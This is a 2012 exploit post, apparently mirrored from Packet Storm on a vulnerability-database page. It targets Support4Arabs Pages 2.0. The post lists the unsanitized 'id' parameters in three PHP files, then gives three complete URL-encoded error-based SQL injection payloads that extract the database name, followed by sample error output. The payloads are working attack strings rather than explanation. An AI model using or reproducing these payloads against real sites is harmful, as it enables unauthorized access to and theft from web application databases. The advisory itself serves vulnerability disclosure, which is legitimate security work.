Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormL0n3ly-H34rTPACKETSTORM:116201
HistorySep 04, 2012 - 12:00 a.m.

Support4Arabs Pages 2.0 SQL Injection

2012-09-0400:00:00
L0n3ly-H34rT
packetstormsecurity.com
13
JSON
`############################################  
### Exploit Title: Support4Arabs Pages v2.0 Remote SQL Error Based Injection Vulnerability  
### Date: 04/9/2012   
### Author: L0n3ly-H34rT   
### Contact: [email protected]   
### My Site: http://se3c.blogspot.com/   
### Vendor Link: http://www.support4arabs.com/  
### Software Link: http://www.traidnt.net/vb/attachments/485227d1274185475-traidnt.zip  
### Version: 2.0  
### Tested on: Linux/Windows   
############################################  
  
# Files affected :  
  
1- pages.php :  
  
$id = strip_tags($_GET['id']);   
  
2- categories.php :  
  
$id = strip_tags($_GET['id']);   
  
3- news.php :  
  
$id = strip_tags($_GET['id']);   
  
# Examples :  
  
http://127.0.0.1/pages/pages.php?do=pages&id=1%27+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+%271%27%3D%271  
  
http://127.0.0.1/pages/categories.php?id=1%27+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+%271%27%3D%271  
  
http://127.0.0.1/pages/news.php?do=news&id=1%27+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+%271%27%3D%271  
  
# The results is :  
  
Duplicate entry '~'pagesv10'~1' for key 'group_key'  
  
# This for example and the name of database is: pagesv10 ...  
  
############################################  
  
# Note :  
  
Must be magic_quotes_gpc = Off  
  
# Greetz to my friendz  
`
JSON